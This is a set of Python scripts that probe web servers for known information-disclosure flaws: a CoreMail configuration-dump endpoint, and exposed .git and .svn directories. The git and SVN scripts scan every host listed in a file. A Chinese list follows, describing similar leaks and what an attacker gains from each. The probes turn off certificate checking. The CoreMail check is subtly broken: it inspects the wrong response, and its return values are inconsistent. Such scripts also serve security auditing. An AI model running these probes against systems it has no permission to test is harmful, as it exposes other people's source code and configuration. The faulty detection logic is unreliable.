1 # CoreMail 2 # coding:utf-8 3 4 import requests 5 import warnings 6 import ssl 7 8 ssl._create_default_https_context = ssl._create_unverified_context 9 10 def verify(protocol,ip,port): 11 url = protocol + '://' + ip + ':' + str(port) 12 warnings.filterwarnings("ignore") 13 print('testing if Coremail information disclose vul') 14 status = '' 15 v_url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/" 16 r = requests.get(url) 17 try: 18 response = requests.get(v_url, verify=False, timeout=5) 19 status = response.status_code 20 if (r.status_code == 200) and ("/home/coremail" in r.text): 21 msg = 'There is CoreMail information disclose vul on url: ' + v_url + '.' 22 print(msg) 23 return True,v_url,msg 24 except Exception as e: 25 msg = str(e) 26 return False, v_url,msg 27 msg = 'There is no CoreMail information disclose vul' 28 return False,msg 29 30 if __name__ == '__main__': 31 res = verify('https','www.xxx.com.cn/china/',80) 32 print(res)
1 #git 2 3 # -*-coding:utf-8-*- 4 5 import requests 6 import ssl 7 from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 9 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 10 ssl._create_default_https_context = ssl._create_unverified_context 11 12 13 def verify(ip, port): 14 url = ip + ':' + str(port) 15 print('testing if git information disclose vul') 16 status = '' 17 contentlen = '' 18 dirconurl = url + '/nodirinthiswebanx4dm1n/' 19 try: 20 dirresponse = requests.get(dirconurl, verify=False, timeout=5) 21 status = dirresponse.status_code 22 gitpath = '/.git/config' 23 giturl = url + gitpath.strip('\r\n') 24 response = requests.get(giturl, timeout=5) 25 if 'repositoryformatversion' in response.text: 26 msg = 'Found /.git/config dir in url:' + giturl + '' 27 print(msg) 28 number = 'v37' 29 return True, url, number, msg 30 else: 31 msg = 'Cannot found /.git/config dir in url:' + giturl + '' 32 number = 'v0' 33 return False, url, number, msg 34 except Exception as e: 35 msg = str(e) 36 number = 'v0' 37 return False, url, number, msg 38 39 if __name__ == '__main__': 40 def get_pass_dict(): 41 pass_dict = [] 42 with open('./IP.txt', 'r') as f: 43 for line in f.readlines(): 44 line = line.strip('\n') 45 pass_dict.append(line) 46 f.close() 47 return pass_dict 48 IP = get_pass_dict() 49 for ip in IP: 50 port = '80' 51 res = verify(ip, port) 52 print(res)
\
1 #SVN 2 3 #-*-coding:utf-8-*- 4 5 import requests 6 import urllib3 7 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 8 9 def verify(ip,port): 10 url = ip+':'+str(port) 11 print('testing if svn entries') 12 status = '' 13 contentlen = '' 14 dirconurl = url+'/nodirinthiswebanx4dm1n/' 15 try: 16 dirresponse=requests.get(dirconurl, verify=False, timeout=10) 17 status=dirresponse.status_code 18 contentLen=dirresponse.headers['content-length'] 19 svnpath = '/.svn/entries' 20 svnurl=url+svnpath.strip('\r\n') 21 response=requests.get(svnurl, verify=False, timeout=10) 22 if response.status_code!=status and response.headers['content-length']!=contentLen: 23 qurl = url+'/.svn/all-wcprops' 24 response2 = requests.get(qurl, verify=False, timeout=6) 25 if 'svn:wc:ra_dav:version-url' in response.text: 26 msg = 'Found /.svn/entries dir in url:'+qurl+' .' 27 print(msg) 28 number = 'v19' 29 return True,url,number,msg 30 else: 31 pass 32 else: 33 pass 34 except Exception as e: 35 msg = str(e) 36 number = 'v0' 37 return False,url,number,msg 38 msg = 'Cannot found /.svn/entries dir in url:' + svnurl + '' 39 number = 'v0' 40 return False, url, number, msg 41 42 if __name__ == '__main__': 43 def get_pass_dict(): 44 pass_dict = [] 45 with open('./IP.txt', 'r') as f: 46 for line in f.readlines(): 47 line = line.strip('\n') 48 pass_dict.append(line) 49 f.close() 50 return pass_dict 51 IP = get_pass_dict() 52 for ip in IP: 53 port = '80' 54 res = verify(ip, port) 55 print(res)
apache httponly cookie信息泄露 "攻击者可以利用该漏洞获取httponly cookies信息,从而窃取敏感信息 git目录泄漏漏洞 攻击者可利用此漏洞获取网站源代码 tomcat样例目录泄漏导致session欺骗漏洞 攻击者可利用此漏洞进行session欺骗,从而获取服务器管理员权限 phpinfo文件泄露 攻击者可通过读取phpinfo文件内容了解网站的一些配置信息,存在信息泄露的风险 SVN源码泄漏漏洞 攻击者可利用此漏洞列出网站目录结构,甚至直接下载网站源码 .htaccess文件泄露 攻击者可通过读取.htaccess文件内容了解网站的一些配置信息,存在信息泄露的风险 apache服务器运行状态信息泄露 攻击者可以根据server-status页面获取客户端连接信息 workspace项目配置信息泄露 攻击者可以利用该漏洞获取workspace项目配置信息,从而窃取敏感信息